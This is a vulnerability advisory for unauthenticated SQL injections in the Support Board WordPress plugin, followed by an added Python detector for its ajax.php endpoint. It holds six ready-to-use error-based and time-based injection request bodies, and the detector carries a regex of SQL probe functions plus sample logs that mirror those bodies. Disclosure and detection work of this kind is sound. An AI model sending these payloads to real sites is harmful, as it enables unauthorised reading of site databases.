wpvulndb | John Jefferson Li | WPVDB-ID: CCF293EC-7607-412B-B662-5E237B8690CA
History: Sep 03, 2021 - 12:00 a.m.

Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections

2021-09-03 00:00:00
John Jefferson Li
wpscan.com

EPSS

0.002

Percentile

58.0%

The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.

PoC

The login-cookie parameter must be present in each request, but the sender does not need to be logged in.

----- PoC 1: Error Based SQLi (status_code) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: status_code (POST)

function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false

----- PoC 2: Error Based SQLi (department) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: department (POST)

function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false

----- PoC 3: Error Based SQLi (user_id) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: user_id (POST)

function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 4: Time Based SQLi (conversation_id) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: conversation_id (POST)

function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 5: Time Based SQLi (conversation_status_code) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: conversation_status_code (POST)

function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false

----- PoC 6: Time Based SQLi (recipient_id) -----
Request: POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: recipient_id (POST)

function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false
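Added detection example (not part of the advisory and not the plugin's own code): a small Python check that looks at POST bodies sent to the ajax.php endpoint named above and flags the six parameters from the description when they carry a MySQL error-based or time-based probe function, or when their value is not the integer / empty / "false" shape that the benign fields in the PoC bodies use. The tab-separated record format, the SAMPLE_LOG records and the assumption that the plugin only expects integers or "false" in these fields are constructed for the example and not taken from the plugin source.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names from the advisory; the "benign shape" below is an
# ASSUMPTION for this example (integer, empty, or the literal "false"), drawn
# from the non-injected fields in the PoC bodies rather than from plugin code.
SUPPORTBOARD_AJAX = "/wp-content/plugins/supportboard/include/ajax.php"
WATCHED_PARAMS = {
    "status_code", "department", "user_id",
    "conversation_id", "conversation_status_code", "recipient_id",
}
BENIGN_VALUE = re.compile(r"^(?:-?\d+|false|)$")
# MySQL functions characteristic of error-based and time-based SQLi probes.
SQLI_MARKERS = re.compile(
    r"\b(?:EXTRACTVALUE|UPDATEXML|GTID_SUBSET|SLEEP|BENCHMARK)\s*\(",
    re.IGNORECASE,
)


def analyse_request(path: str, body: str) -> list:
    """Return (parameter, reason) findings for one POST to the plugin endpoint.

    `body` is the raw application/x-www-form-urlencoded request body.
    """
    findings = []
    if urlsplit(path).path != SUPPORTBOARD_AJAX:
        return findings
    # keep_blank_values so an empty "department=" is still inspected
    params = parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            if SQLI_MARKERS.search(value):
                findings.append((name, "sql-function-probe"))
            elif not BENIGN_VALUE.match(value.strip()):
                findings.append((name, "unexpected-value-shape"))
    return findings


def scan_log(records) -> list:
    """Return [(record_number, findings)] for each record that produced findings.

    Each record is CONSTRUCTED as "<method>\\t<path>\\t<body>"; malformed lines
    and non-POST requests are skipped.
    """
    hits = []
    for number, record in enumerate(records, start=1):
        parts = record.split("\t", 2)
        if len(parts) != 3 or parts[0] != "POST":
            continue
        findings = analyse_request(parts[1], parts[2])
        if findings:
            hits.append((number, findings))
    return hits


# CONSTRUCTED sample records; the probe shapes mirror the advisory's PoCs.
_AJAX = SUPPORTBOARD_AJAX
SAMPLE_LOG = [
    "POST\t" + _AJAX + "\tfunction=new-conversation&status_code=2&title=&department="
    "&agent_id=&routing=false&login-cookie=&user_id=46&language=false",
    "POST\t" + _AJAX + "\tfunction=new-conversation&status_code=2%22+AND+EXTRACTVALUE"
    "(4597%2Cdatabase())&title=&department=&login-cookie=&user_id=46",
    "POST\t" + _AJAX + "\tfunction=send-message&user_id=5&conversation_id=45%22+AND+"
    "(SELECT+1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test&login-cookie=",
    "POST\t" + _AJAX + "\tfunction=send-message&user_id=5&conversation_id=45"
    "&message=hello&recipient_id=false&login-cookie=",
    "POST\t" + _AJAX + "\tfunction=new-conversation&status_code=2o&title="
    "&department=(UPDATEXML(5632%2C0x2e%2C3004))&login-cookie=&user_id=46",
    "POST\t/wp-login.php\tlog=admin&pwd=x",
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        for name, reason in findings:
            print(f"record {number}: parameter {name!r} -> {reason}")
```

The value-shape check catches PoC 2's "2o" style garbage as well as the probe functions, so a single malformed integer in one of these fields is worth a look even without a recognised SQL function in it; tune BENIGN_VALUE to whatever the deployed plugin version actually accepts before relying on that branch.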

